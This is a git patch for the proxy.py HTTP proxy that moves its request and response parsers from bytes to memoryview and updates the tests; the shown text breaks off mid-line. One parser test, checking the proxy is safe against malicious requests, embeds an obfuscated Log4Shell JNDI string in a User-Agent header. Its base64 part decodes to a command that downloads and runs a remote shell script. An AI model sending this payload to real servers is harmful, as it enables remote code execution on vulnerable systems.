From 1abe0a72407083e60bf54401b19340ffd1ac5bb1 Mon Sep 17 00:00:00 2001 From: Abhinav Singh Date: Wed, 26 Jan 2022 18:20:22 +0530 Subject: [PATCH 1/5] Remove usage of `tobytes` --- proxy/http/handler.py | 4 +- proxy/http/parser/chunk.py | 8 +- proxy/http/parser/parser.py | 69 ++++--- proxy/http/proxy/server.py | 17 +- proxy/http/server/web.py | 4 +- proxy/http/websocket/client.py | 4 +- proxy/plugin/modify_chunk_response.py | 2 +- tests/http/parser/test_http_parser.py | 181 +++++++++--------- tests/http/test_protocol_handler.py | 2 +- tests/plugin/test_http_proxy_plugins.py | 8 +- ...ttp_proxy_plugins_with_tls_interception.py | 2 +- 11 files changed, 149 insertions(+), 152 deletions(-) diff --git a/proxy/http/handler.py b/proxy/http/handler.py index e1aff89ee6..c8d070411c 100644 --- a/proxy/http/handler.py +++ b/proxy/http/handler.py @@ -268,9 +268,7 @@ def _discover_plugin_klass(self, protocol: int) -> Optional[Type['HttpProtocolHa def _parse_first_request(self, data: memoryview) -> bool: # Parse http request try: - # TODO(abhinavsingh): Remove .tobytes after parser is - # memoryview compliant - self.request.parse(data.tobytes()) + self.request.parse(data) except HttpProtocolException as e: # noqa: WPS329 self.work.queue(BAD_REQUEST_RESPONSE_PKT) raise e diff --git a/proxy/http/parser/chunk.py b/proxy/http/parser/chunk.py index 691117926d..eb35798955 100644 --- a/proxy/http/parser/chunk.py +++ b/proxy/http/parser/chunk.py @@ -34,13 +34,13 @@ def __init__(self) -> None: # Expected size of next following chunk self.size: Optional[int] = None - def parse(self, raw: bytes) -> bytes: + def parse(self, raw: memoryview) -> memoryview: more = len(raw) > 0 while more and self.state != chunkParserStates.COMPLETE: - more, raw = self.process(raw) + more, raw = self.process(raw.tobytes()) return raw - def process(self, raw: bytes) -> Tuple[bool, bytes]: + def process(self, raw: bytes) -> Tuple[bool, memoryview]: if self.state == chunkParserStates.WAITING_FOR_SIZE: # Consume prior chunk in buffer # in case chunk size without CRLF was received @@ -69,7 +69,7 @@ def process(self, raw: bytes) -> Tuple[bool, bytes]: self.state = chunkParserStates.WAITING_FOR_SIZE self.chunk = b'' self.size = None - return len(raw) > 0, raw + return len(raw) > 0, memoryview(raw) @staticmethod def to_chunks(raw: bytes, chunk_size: int = DEFAULT_BUFFER_SIZE) -> bytes: diff --git a/proxy/http/parser/parser.py b/proxy/http/parser/parser.py index 00790c32d8..42c7f8f74a 100644 --- a/proxy/http/parser/parser.py +++ b/proxy/http/parser/parser.py @@ -77,7 +77,7 @@ def __init__( # Total size of raw bytes passed for parsing self.total_size: int = 0 # Buffer to hold unprocessed bytes - self.buffer: bytes = b'' + self.buffer: Optional[memoryview] = None # Internal headers data structure: # - Keys are lower case header names. # - Values are 2-tuple containing original @@ -102,13 +102,13 @@ def request( httpParserTypes.REQUEST_PARSER, enable_proxy_protocol=enable_proxy_protocol, ) - parser.parse(raw) + parser.parse(memoryview(raw)) return parser @classmethod def response(cls: Type[T], raw: bytes) -> T: parser = cls(httpParserTypes.RESPONSE_PARSER) - parser.parse(raw) + parser.parse(memoryview(raw)) return parser def header(self, key: bytes) -> bytes: @@ -206,14 +206,21 @@ def body_expected(self) -> bool: """Returns true if content or chunked response is expected.""" return self._content_expected or self._is_chunked_encoded - def parse(self, raw: bytes, allowed_url_schemes: Optional[List[bytes]] = None) -> None: + def parse( + self, + raw: memoryview, + allowed_url_schemes: Optional[List[bytes]] = None, + ) -> None: """Parses HTTP request out of raw bytes. Check for `HttpParser.state` after `parse` has successfully returned.""" size = len(raw) self.total_size += size - raw = self.buffer + raw - self.buffer, more = b'', size > 0 + if self.buffer: + # TODO(abhinavsingh): Instead of tobytes our parser + # must be capable of working with arrays of memoryview + raw = memoryview(self.buffer.tobytes() + raw.tobytes()) + self.buffer, more = None, size > 0 while more and self.state != httpParserStates.COMPLETE: # gte with HEADERS_COMPLETE also encapsulated RCVING_BODY state if self.state >= httpParserStates.HEADERS_COMPLETE: @@ -237,7 +244,7 @@ def parse(self, raw: bytes, allowed_url_schemes: Optional[List[bytes]] = None) - not (self._content_expected or self._is_chunked_encoded) and \ raw == b'': self.state = httpParserStates.COMPLETE - self.buffer = raw + self.buffer = None if raw == b'' else raw def build(self, disable_headers: Optional[List[bytes]] = None, for_proxy: bool = False) -> bytes: """Rebuild the request object.""" @@ -278,7 +285,7 @@ def build_response(self) -> bytes: body=self._get_body_or_chunks(), ) - def _process_body(self, raw: bytes) -> Tuple[bool, bytes]: + def _process_body(self, raw: memoryview) -> Tuple[bool, memoryview]: # Ref: http://www.ietf.org/rfc/rfc2616.txt # 3.If a Content-Length header field (section 14.13) is present, its # decimal value in OCTETs represents both the entity-length and the @@ -297,7 +304,8 @@ def _process_body(self, raw: bytes) -> Tuple[bool, bytes]: self.body = self.chunk.body self.state = httpParserStates.COMPLETE more = False - elif self._content_expected: + return more, raw + if self._content_expected: self.state = httpParserStates.RCVING_BODY if self.body is None: self.body = b'' @@ -308,22 +316,21 @@ def _process_body(self, raw: bytes) -> Tuple[bool, bytes]: len(self.body) == int(self.header(b'content-length')): self.state = httpParserStates.COMPLETE more, raw = len(raw) > 0, raw[total_size - received_size:] - else: - self.state = httpParserStates.RCVING_BODY - # Received a packet without content-length header - # and no transfer-encoding specified. - # - # This can happen for both HTTP/1.0 and HTTP/1.1 scenarios. - # Currently, we consume the remaining buffer as body. - # - # Ref https://github.com/abhinavsingh/proxy.py/issues/398 - # - # See TestHttpParser.test_issue_398 scenario - self.body = raw - more, raw = False, b'' - return more, raw - - def _process_headers(self, raw: bytes) -> Tuple[bool, bytes]: + return more, raw + # Received a packet without content-length header + # and no transfer-encoding specified. + # + # This can happen for both HTTP/1.0 and HTTP/1.1 scenarios. + # Currently, we consume the remaining buffer as body. + # + # Ref https://github.com/abhinavsingh/proxy.py/issues/398 + # + # See TestHttpParser.test_issue_398 scenario + self.state = httpParserStates.RCVING_BODY + self.body = raw + return False, memoryview(b'') + + def _process_headers(self, raw: memoryview) -> Tuple[bool, memoryview]: """Returns False when no CRLF could be found in received bytes. TODO: We should not return until parser reaches headers complete @@ -334,10 +341,10 @@ def _process_headers(self, raw: bytes) -> Tuple[bool, bytes]: This will also help make the parser even more stateless. """ while True: - parts = raw.split(CRLF, 1) + parts = raw.tobytes().split(CRLF, 1) if len(parts) == 1: return False, raw - line, raw = parts[0], parts[1] + line, raw = parts[0], memoryview(parts[1]) if self.state in (httpParserStates.LINE_RCVD, httpParserStates.RCVING_HEADERS): if line == b'' or line.strip() == b'': # Blank line received. self.state = httpParserStates.HEADERS_COMPLETE @@ -352,14 +359,14 @@ def _process_headers(self, raw: bytes) -> Tuple[bool, bytes]: def _process_line( self, - raw: bytes, + raw: memoryview, allowed_url_schemes: Optional[List[bytes]] = None, - ) -> Tuple[bool, bytes]: + ) -> Tuple[bool, memoryview]: while True: - parts = raw.split(CRLF, 1) + parts = raw.tobytes().split(CRLF, 1) if len(parts) == 1: return False, raw - line, raw = parts[0], parts[1] + line, raw = parts[0], memoryview(parts[1]) if self.type == httpParserTypes.REQUEST_PARSER: if self.protocol is not None and self.protocol.version is None: # We expect to receive entire proxy protocol v1 line diff --git a/proxy/http/proxy/server.py b/proxy/http/proxy/server.py index f6ad9a028b..019eb651e7 100644 --- a/proxy/http/proxy/server.py +++ b/proxy/http/proxy/server.py @@ -276,11 +276,8 @@ async def read_from_descriptors(self, r: Readables) -> bool: if self.response.is_complete: self.handle_pipeline_response(raw) else: - # TODO(abhinavsingh): Remove .tobytes after parser is - # memoryview compliant - chunk = raw.tobytes() - self.response.parse(chunk) - self.emit_response_events(len(chunk)) + self.response.parse(raw) + self.emit_response_events(len(raw)) else: self.response.total_size += len(raw) # queue raw data for client @@ -430,7 +427,6 @@ def on_client_data(self, raw: memoryview) -> None: # must be treated as WebSocket protocol packets. self.upstream.queue(raw) return - if self.pipeline_request is None: # For pipeline requests, we never # want to use --enable-proxy-protocol flag @@ -443,10 +439,7 @@ def on_client_data(self, raw: memoryview) -> None: self.pipeline_request = HttpParser( httpParserTypes.REQUEST_PARSER, ) - - # TODO(abhinavsingh): Remove .tobytes after parser is - # memoryview compliant - self.pipeline_request.parse(raw.tobytes()) + self.pipeline_request.parse(raw) if self.pipeline_request.is_complete: for plugin in self.plugins.values(): assert self.pipeline_request is not None @@ -555,9 +548,7 @@ def handle_pipeline_response(self, raw: memoryview) -> None: self.pipeline_response = HttpParser( httpParserTypes.RESPONSE_PARSER, ) - # TODO(abhinavsingh): Remove .tobytes after parser is memoryview - # compliant - self.pipeline_response.parse(raw.tobytes()) + self.pipeline_response.parse(raw) if self.pipeline_response.is_complete: self.pipeline_response = None diff --git a/proxy/http/server/web.py b/proxy/http/server/web.py index c3376b3765..06072493b2 100644 --- a/proxy/http/server/web.py +++ b/proxy/http/server/web.py @@ -201,9 +201,7 @@ def on_client_data(self, raw: memoryview) -> None: self.pipeline_request = HttpParser( httpParserTypes.REQUEST_PARSER, ) - # TODO(abhinavsingh): Remove .tobytes after parser is memoryview - # compliant - self.pipeline_request.parse(raw.tobytes()) + self.pipeline_request.parse(raw) if self.pipeline_request.is_complete: self.route.handle_request(self.pipeline_request) if not self.pipeline_request.is_http_1_1_keep_alive: diff --git a/proxy/http/websocket/client.py b/proxy/http/websocket/client.py index 223ff50482..2f61cbab89 100644 --- a/proxy/http/websocket/client.py +++ b/proxy/http/websocket/client.py @@ -77,7 +77,7 @@ def upgrade(self) -> None: ), ) response = HttpParser(httpParserTypes.RESPONSE_PARSER) - response.parse(self.sock.recv(DEFAULT_BUFFER_SIZE)) + response.parse(memoryview(self.sock.recv(DEFAULT_BUFFER_SIZE))) accept = response.header(b'Sec-Websocket-Accept') assert WebsocketFrame.key_to_accept(key) == accept @@ -100,8 +100,6 @@ def run_once(self) -> bool: self.closed = True return True frame = WebsocketFrame() - # TODO(abhinavsingh): Remove .tobytes after parser is - # memoryview compliant frame.parse(raw.tobytes()) self.on_message(frame) elif mask & selectors.EVENT_WRITE: diff --git a/proxy/plugin/modify_chunk_response.py b/proxy/plugin/modify_chunk_response.py index 16171e1f11..f050121fc0 100644 --- a/proxy/plugin/modify_chunk_response.py +++ b/proxy/plugin/modify_chunk_response.py @@ -32,7 +32,7 @@ def __init__(self, *args: Any, **kwargs: Any) -> None: def handle_upstream_chunk(self, chunk: memoryview) -> Optional[memoryview]: # Parse the response. # Note that these chunks also include headers - self.response.parse(chunk.tobytes()) + self.response.parse(chunk) # If response is complete, modify and dispatch to client if self.response.is_complete: # Avoid setting a body for responses where a body is not expected. diff --git a/tests/http/parser/test_http_parser.py b/tests/http/parser/test_http_parser.py index a8192c8a8e..4acd21dd65 100644 --- a/tests/http/parser/test_http_parser.py +++ b/tests/http/parser/test_http_parser.py @@ -28,21 +28,21 @@ def setUp(self) -> None: def test_issue_127(self) -> None: with self.assertRaises(HttpProtocolException): - self.parser.parse(CRLF) + self.parser.parse(memoryview(CRLF)) with self.assertRaises(HttpProtocolException): raw = b'qwqrqw!@!#@!#ad adfad\r\n' while True: - self.parser.parse(raw) + self.parser.parse(memoryview(raw)) def test_issue_398(self) -> None: p = HttpParser(httpParserTypes.RESPONSE_PARSER) - p.parse(HTTP_1_0 + b' 200 OK' + CRLF) + p.parse(memoryview(HTTP_1_0 + b' 200 OK' + CRLF)) self.assertEqual(p.version, HTTP_1_0) self.assertEqual(p.code, b'200') self.assertEqual(p.reason, b'OK') self.assertEqual(p.state, httpParserStates.LINE_RCVD) - p.parse( + p.parse(memoryview( b'CP=CAO PSA OUR' + CRLF + b'Cache-Control:private,max-age=0;' + CRLF + b'X-Frame-Options:SAMEORIGIN' + CRLF + @@ -53,12 +53,12 @@ def test_issue_398(self) -> None: b'Set-Cookie: lang=eng; path=/;HttpOnly;' + CRLF + b'Content-type:text/html;charset=UTF-8;' + CRLF + CRLF + b'', - ) + )) self.assertEqual(p.body, b'') self.assertEqual(p.state, httpParserStates.RCVING_BODY) def test_urlparse(self) -> None: - self.parser.parse(b'CONNECT httpbin.org:443 HTTP/1.1\r\n') + self.parser.parse(memoryview(b'CONNECT httpbin.org:443 HTTP/1.1\r\n')) self.assertTrue(self.parser.is_https_tunnel) self.assertFalse(self.parser.is_connection_upgrade) self.assertTrue(self.parser.is_http_1_1_keep_alive) @@ -69,41 +69,43 @@ def test_urlparse(self) -> None: self.assertNotEqual(self.parser.state, httpParserStates.COMPLETE) def test_urlparse_on_invalid_connect_request(self) -> None: - self.parser.parse(b'CONNECT / HTTP/1.0\r\n\r\n') + self.parser.parse(memoryview(b'CONNECT / HTTP/1.0\r\n\r\n')) self.assertTrue(self.parser.is_https_tunnel) self.assertEqual(self.parser.host, None) self.assertEqual(self.parser.port, 443) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) def test_unicode_character_domain_connect(self) -> None: - self.parser.parse(bytes_('CONNECT ççç.org:443 HTTP/1.1\r\n')) + self.parser.parse(memoryview( + bytes_('CONNECT ççç.org:443 HTTP/1.1\r\n'))) self.assertTrue(self.parser.is_https_tunnel) self.assertEqual(self.parser.host, bytes_('ççç.org')) self.assertEqual(self.parser.port, 443) def test_invalid_ipv6_in_request_line(self) -> None: self.parser.parse( - bytes_('CONNECT 2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF:443 HTTP/1.1\r\n'), + memoryview( + bytes_('CONNECT 2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF:443 HTTP/1.1\r\n')), ) self.assertTrue(self.parser.is_https_tunnel) self.assertEqual( - self.parser.host, bytes_( + self.parser.host, memoryview(bytes_( '[2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]', - ), + )), ) self.assertEqual(self.parser.port, 443) def test_valid_ipv6_in_request_line(self) -> None: self.parser.parse( - bytes_( + memoryview(bytes_( 'CONNECT [2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]:443 HTTP/1.1\r\n', - ), + )), ) self.assertTrue(self.parser.is_https_tunnel) self.assertEqual( - self.parser.host, bytes_( + self.parser.host, memoryview(bytes_( '[2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]', - ), + )), ) self.assertEqual(self.parser.port, 443) @@ -223,9 +225,9 @@ def test_find_line_returns_None(self) -> None: def test_connect_request_with_crlf_as_separate_chunk(self) -> None: """See https://github.com/abhinavsingh/py/issues/70 for background.""" raw = b'CONNECT pypi.org:443 HTTP/1.0\r\n' - self.parser.parse(raw) + self.parser.parse(memoryview(raw)) self.assertEqual(self.parser.state, httpParserStates.LINE_RCVD) - self.parser.parse(CRLF) + self.parser.parse(memoryview(CRLF)) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) def test_get_full_parse(self) -> None: @@ -238,7 +240,7 @@ def test_get_full_parse(self) -> None: b'https://example.com/path/dir/?a=b&c=d#p=q', b'example.com', ) - self.parser.parse(pkt) + self.parser.parse(memoryview(pkt)) self.assertEqual(self.parser.total_size, len(pkt)) assert self.parser._url and self.parser._url.remainder self.assertEqual(self.parser._url.remainder, b'/path/dir/?a=b&c=d#p=q') @@ -264,7 +266,7 @@ def test_get_full_parse(self) -> None: def test_line_rcvd_to_rcving_headers_state_change(self) -> None: pkt = b'GET http://localhost HTTP/1.1' - self.parser.parse(pkt) + self.parser.parse(memoryview(pkt)) self.assertEqual(self.parser.total_size, len(pkt)) self.assert_state_change_with_crlf( httpParserStates.INITIALIZED, @@ -276,7 +278,7 @@ def test_get_partial_parse1(self) -> None: pkt = CRLF.join([ b'GET http://localhost:8080 HTTP/1.1', ]) - self.parser.parse(pkt) + self.parser.parse(memoryview(pkt)) self.assertEqual(self.parser.total_size, len(pkt)) self.assertEqual(self.parser.method, None) self.assertEqual(self.parser._url, None) @@ -286,7 +288,7 @@ def test_get_partial_parse1(self) -> None: httpParserStates.INITIALIZED, ) - self.parser.parse(CRLF) + self.parser.parse(memoryview(CRLF)) self.assertEqual(self.parser.total_size, len(pkt) + len(CRLF)) self.assertEqual(self.parser.method, b'GET') assert self.parser._url @@ -296,7 +298,7 @@ def test_get_partial_parse1(self) -> None: self.assertEqual(self.parser.state, httpParserStates.LINE_RCVD) host_hdr = b'Host: localhost:8080' - self.parser.parse(host_hdr) + self.parser.parse(memoryview(host_hdr)) self.assertEqual( self.parser.total_size, len(pkt) + len(CRLF) + len(host_hdr), @@ -305,7 +307,7 @@ def test_get_partial_parse1(self) -> None: self.assertEqual(self.parser.buffer, b'Host: localhost:8080') self.assertEqual(self.parser.state, httpParserStates.LINE_RCVD) - self.parser.parse(CRLF * 2) + self.parser.parse(memoryview(CRLF * 2)) self.assertEqual( self.parser.total_size, len(pkt) + (3 * len(CRLF)) + len(host_hdr), @@ -321,12 +323,12 @@ def test_get_partial_parse1(self) -> None: self.assertEqual(self.parser.state, httpParserStates.COMPLETE) def test_get_partial_parse2(self) -> None: - self.parser.parse( + self.parser.parse(memoryview( CRLF.join([ b'GET http://localhost:8080 HTTP/1.1', b'Host: ', ]), - ) + )) self.assertEqual(self.parser.method, b'GET') assert self.parser._url self.assertEqual(self.parser._url.hostname, b'localhost') @@ -335,7 +337,7 @@ def test_get_partial_parse2(self) -> None: self.assertEqual(self.parser.buffer, b'Host: ') self.assertEqual(self.parser.state, httpParserStates.LINE_RCVD) - self.parser.parse(b'localhost:8080' + CRLF) + self.parser.parse(memoryview(b'localhost:8080' + CRLF)) assert self.parser.headers self.assertEqual( self.parser.headers[b'host'], @@ -344,14 +346,14 @@ def test_get_partial_parse2(self) -> None: b'localhost:8080', ), ) - self.assertEqual(self.parser.buffer, b'') + self.assertEqual(self.parser.buffer, None) self.assertEqual( self.parser.state, httpParserStates.RCVING_HEADERS, ) - self.parser.parse(b'Content-Type: text/plain' + CRLF) - self.assertEqual(self.parser.buffer, b'') + self.parser.parse(memoryview(b'Content-Type: text/plain' + CRLF)) + self.assertEqual(self.parser.buffer, None) assert self.parser.headers self.assertEqual( self.parser.headers[b'content-type'], ( @@ -364,7 +366,7 @@ def test_get_partial_parse2(self) -> None: httpParserStates.RCVING_HEADERS, ) - self.parser.parse(CRLF) + self.parser.parse(memoryview(CRLF)) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) def test_post_full_parse(self) -> None: @@ -375,7 +377,7 @@ def test_post_full_parse(self) -> None: b'Content-Type: application/x-www-form-urlencoded' + CRLF, b'a=b&c=d', ]) - self.parser.parse(raw % b'http://localhost') + self.parser.parse(memoryview(raw % b'http://localhost')) self.assertEqual(self.parser.method, b'POST') assert self.parser._url self.assertEqual(self.parser._url.hostname, b'localhost') @@ -391,7 +393,7 @@ def test_post_full_parse(self) -> None: (b'Content-Length', b'7'), ) self.assertEqual(self.parser.body, b'a=b&c=d') - self.assertEqual(self.parser.buffer, b'') + self.assertEqual(self.parser.buffer, None) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) self.assertEqual(len(self.parser.build()), len(raw % b'/')) @@ -402,20 +404,20 @@ def assert_state_change_with_crlf( final_state: int, ) -> None: self.assertEqual(self.parser.state, initial_state) - self.parser.parse(CRLF) + self.parser.parse(memoryview(CRLF)) self.assertEqual(self.parser.state, next_state) - self.parser.parse(CRLF) + self.parser.parse(memoryview(CRLF)) self.assertEqual(self.parser.state, final_state) def test_post_partial_parse(self) -> None: - self.parser.parse( + self.parser.parse(memoryview( CRLF.join([ b'POST http://localhost HTTP/1.1', b'Host: localhost', b'Content-Length: 7', b'Content-Type: application/x-www-form-urlencoded', ]), - ) + )) self.assertEqual(self.parser.method, b'POST') assert self.parser._url self.assertEqual(self.parser._url.hostname, b'localhost') @@ -427,18 +429,18 @@ def test_post_partial_parse(self) -> None: httpParserStates.HEADERS_COMPLETE, ) - self.parser.parse(b'a=b') + self.parser.parse(memoryview(b'a=b')) self.assertEqual( self.parser.state, httpParserStates.RCVING_BODY, ) self.assertEqual(self.parser.body, b'a=b') - self.assertEqual(self.parser.buffer, b'') + self.assertEqual(self.parser.buffer, None) - self.parser.parse(b'&c=d') + self.parser.parse(memoryview(b'&c=d')) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) self.assertEqual(self.parser.body, b'a=b&c=d') - self.assertEqual(self.parser.buffer, b'') + self.assertEqual(self.parser.buffer, None) def test_connect_request_without_host_header_request_parse(self) -> None: """Case where clients can send CONNECT request without a Host header field. @@ -451,7 +453,7 @@ def test_connect_request_without_host_header_request_parse(self) -> None: See https://github.com/abhinavsingh/py/issues/5 for details. """ - self.parser.parse(b'CONNECT pypi.org:443 HTTP/1.0\r\n\r\n') + self.parser.parse(memoryview(b'CONNECT pypi.org:443 HTTP/1.0\r\n\r\n')) self.assertEqual(self.parser.method, httpMethods.CONNECT) self.assertEqual(self.parser.version, b'HTTP/1.0') self.assertEqual(self.parser.state, httpParserStates.COMPLETE) @@ -465,14 +467,14 @@ def test_request_parse_without_content_length(self) -> None: See https://github.com/abhinavsingh/py/issues/20 for details. """ - self.parser.parse( + self.parser.parse(memoryview( CRLF.join([ b'POST http://localhost HTTP/1.1', b'Host: localhost', b'Content-Type: application/x-www-form-urlencoded', CRLF, ]), - ) + )) self.assertEqual(self.parser.method, b'POST') self.assertEqual(self.parser.state, httpParserStates.COMPLETE) @@ -492,17 +494,17 @@ def test_response_parse_without_content_length(self) -> None: pipelined responses not trigger stream close but may receive multiple responses. """ self.parser.type = httpParserTypes.RESPONSE_PARSER - self.parser.parse(b'HTTP/1.0 200 OK' + CRLF) + self.parser.parse(memoryview(b'HTTP/1.0 200 OK' + CRLF)) self.assertEqual(self.parser.code, b'200') self.assertEqual(self.parser.version, b'HTTP/1.0') self.assertEqual(self.parser.state, httpParserStates.LINE_RCVD) - self.parser.parse( + self.parser.parse(memoryview( CRLF.join([ b'Server: BaseHTTP/0.3 Python/2.7.10', b'Date: Thu, 13 Dec 2018 16:24:09 GMT', CRLF, ]), - ) + )) self.assertEqual( self.parser.state, httpParserStates.COMPLETE, @@ -510,7 +512,7 @@ def test_response_parse_without_content_length(self) -> None: def test_response_parse(self) -> None: self.parser.type = httpParserTypes.RESPONSE_PARSER - self.parser.parse( + self.parser.parse(memoryview( b''.join([ b'HTTP/1.1 301 Moved Permanently\r\n', b'Location: http://www.google.com/\r\n', @@ -527,7 +529,7 @@ def test_response_parse(self) -> None: b'\n

301 Moved

\nThe document has moved\n' + b'here.\r\n\r\n', ]), - ) + )) self.assertEqual(self.parser.code, b'301') self.assertEqual(self.parser.reason, b'Moved Permanently') self.assertEqual(self.parser.version, b'HTTP/1.1') @@ -546,7 +548,7 @@ def test_response_parse(self) -> None: def test_response_partial_parse(self) -> None: self.parser.type = httpParserTypes.RESPONSE_PARSER - self.parser.parse( + self.parser.parse(memoryview( b''.join([ b'HTTP/1.1 301 Moved Permanently\r\n', b'Location: http://www.google.com/\r\n', @@ -559,7 +561,7 @@ def test_response_partial_parse(self) -> None: b'X-XSS-Protection: 1; mode=block\r\n', b'X-Frame-Options: SAMEORIGIN\r\n', ]), - ) + )) assert self.parser.headers self.assertEqual( self.parser.headers[b'x-frame-options'], @@ -569,28 +571,28 @@ def test_response_partial_parse(self) -> None: self.parser.state, httpParserStates.RCVING_HEADERS, ) - self.parser.parse(b'\r\n') + self.parser.parse(memoryview(CRLF)) self.assertEqual( self.parser.state, httpParserStates.HEADERS_COMPLETE, ) - self.parser.parse( + self.parser.parse(memoryview( b'\n' + b'301 Moved', - ) + )) self.assertEqual( self.parser.state, httpParserStates.RCVING_BODY, ) - self.parser.parse( + self.parser.parse(memoryview( b'\n

301 Moved

\nThe document has moved\n' + b'here.\r\n\r\n', - ) + )) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) def test_chunked_response_parse(self) -> None: self.parser.type = httpParserTypes.RESPONSE_PARSER - self.parser.parse( + self.parser.parse(memoryview( b''.join([ b'HTTP/1.1 200 OK\r\n', b'Content-Type: application/json\r\n', @@ -607,7 +609,7 @@ def test_chunked_response_parse(self) -> None: b'0\r\n', b'\r\n', ]), - ) + )) self.assertEqual(self.parser.body, b'Wikipedia in\r\n\r\nchunks.') self.assertEqual(self.parser.state, httpParserStates.COMPLETE) @@ -635,20 +637,21 @@ def test_pipelined_chunked_response_parse(self) -> None: def assert_pipeline_response(self, response: memoryview) -> None: self.parser = HttpParser(httpParserTypes.RESPONSE_PARSER) - self.parser.parse(response.tobytes() + response.tobytes()) + self.parser.parse(memoryview(response.tobytes() + response.tobytes())) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) self.assertEqual(self.parser.body, b'{"key":"value"}') self.assertEqual(self.parser.buffer, response) # parse buffer parser = HttpParser(httpParserTypes.RESPONSE_PARSER) + assert self.parser.buffer parser.parse(self.parser.buffer) self.assertEqual(parser.state, httpParserStates.COMPLETE) self.assertEqual(parser.body, b'{"key":"value"}') - self.assertEqual(parser.buffer, b'') + self.assertEqual(parser.buffer, None) def test_chunked_request_parse(self) -> None: - self.parser.parse( + self.parser.parse(memoryview( build_http_request( httpMethods.POST, b'http://example.org/', @@ -658,7 +661,7 @@ def test_chunked_request_parse(self) -> None: }, body=b'f\r\n{"key":"value"}\r\n0\r\n\r\n', ), - ) + )) self.assertEqual(self.parser.body, b'{"key":"value"}') self.assertEqual(self.parser.state, httpParserStates.COMPLETE) self.assertEqual( @@ -674,39 +677,39 @@ def test_chunked_request_parse(self) -> None: ) def test_is_http_1_1_keep_alive(self) -> None: - self.parser.parse( + self.parser.parse(memoryview( build_http_request( httpMethods.GET, b'/', ), - ) + )) self.assertTrue(self.parser.is_http_1_1_keep_alive) def test_is_http_1_1_keep_alive_with_non_close_connection_header(self) -> None: - self.parser.parse( + self.parser.parse(memoryview( build_http_request( httpMethods.GET, b'/', headers={ b'Connection': b'keep-alive', }, ), - ) + )) self.assertTrue(self.parser.is_http_1_1_keep_alive) def test_is_not_http_1_1_keep_alive_with_close_header(self) -> None: - self.parser.parse( + self.parser.parse(memoryview( build_http_request( httpMethods.GET, b'/', conn_close=True, ), - ) + )) self.assertFalse(self.parser.is_http_1_1_keep_alive) def test_is_not_http_1_1_keep_alive_for_http_1_0(self) -> None: - self.parser.parse( + self.parser.parse(memoryview( build_http_request( httpMethods.GET, b'/', protocol_version=b'HTTP/1.0', ), - ) + )) self.assertFalse(self.parser.is_http_1_1_keep_alive) def test_paramiko_doc(self) -> None: @@ -715,7 +718,7 @@ def test_paramiko_doc(self) -> None: b'\r\nX-Cname-TryFiles: True\r\nX-Served: Nginx\r\nX-Deity: web02\r\nCF-Cache-Status: DYNAMIC' \ b'\r\nServer: cloudflare\r\nCF-RAY: 53f2208c6fef6c38-SJC\r\n\r\n' self.parser = HttpParser(httpParserTypes.RESPONSE_PARSER) - self.parser.parse(response) + self.parser.parse(memoryview(response)) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) def test_request_factory(self) -> None: @@ -766,7 +769,7 @@ def test_proxy_protocol_not_for_response_parser(self) -> None: ) def test_is_safe_against_malicious_requests(self) -> None: - self.parser.parse( + self.parser.parse(memoryview( b'GET / HTTP/1.1\r\n' + b'Host: 34.131.9.210:443\r\n' + b'User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + @@ -783,7 +786,7 @@ def test_is_safe_against_malicious_requests(self) -> None: b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}' + b'\r\n\r\n', - ) + )) self.assertEqual( self.parser.header(b'user-agent'), b'${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + @@ -816,20 +819,22 @@ def test_is_safe_against_malicious_requests(self) -> None: def test_parses_icap_protocol(self) -> None: # Ref https://datatracker.ietf.org/doc/html/rfc3507 self.parser.parse( - b'REQMOD icap://icap-server.net/server?arg=87 ICAP/1.0\r\n' + - b'Host: icap-server.net\r\n' + - b'Encapsulated: req-hdr=0, req-body=154' + - b'\r\n\r\n' + - b'POST /origin-resource/form.pl HTTP/1.1\r\n' + - b'Host: www.origin-server.com\r\n' + - b'Accept: text/html, text/plain\r\n' + - b'Accept-Encoding: compress\r\n' + - b'Cache-Control: no-cache\r\n' + - b'\r\n' + - b'1e\r\n' + - b'I am posting this information.\r\n' + - b'0\r\n' + - b'\r\n', + memoryview( + b'REQMOD icap://icap-server.net/server?arg=87 ICAP/1.0\r\n' + + b'Host: icap-server.net\r\n' + + b'Encapsulated: req-hdr=0, req-body=154' + + b'\r\n\r\n' + + b'POST /origin-resource/form.pl HTTP/1.1\r\n' + + b'Host: www.origin-server.com\r\n' + + b'Accept: text/html, text/plain\r\n' + + b'Accept-Encoding: compress\r\n' + + b'Cache-Control: no-cache\r\n' + + b'\r\n' + + b'1e\r\n' + + b'I am posting this information.\r\n' + + b'0\r\n' + + b'\r\n', + ), allowed_url_schemes=[b'icap'], ) self.assertEqual(self.parser.method, b'REQMOD') @@ -844,7 +849,7 @@ def test_cannot_parse_sip_protocol(self) -> None: # Will fail to parse because of invalid host and port in the request line # Our Url parser expects an integer port. with self.assertRaises(ValueError): - self.parser.parse( + self.parser.parse(memoryview( b'OPTIONS sip:nm SIP/2.0\r\n' + b'Via: SIP/2.0/TCP nm;branch=foo\r\n' + b'From: ;tag=root\r\nTo: \r\n' + @@ -855,4 +860,4 @@ def test_cannot_parse_sip_protocol(self) -> None: b'Contact: \r\n' + b'Accept: application/sdp\r\n' + b'\r\n', - ) + )) diff --git a/tests/http/test_protocol_handler.py b/tests/http/test_protocol_handler.py index a491e286f8..0ba0b44284 100644 --- a/tests/http/test_protocol_handler.py +++ b/tests/http/test_protocol_handler.py @@ -230,7 +230,7 @@ async def assert_tunnel_response( server.closed = False parser = HttpParser(httpParserTypes.RESPONSE_PARSER) - 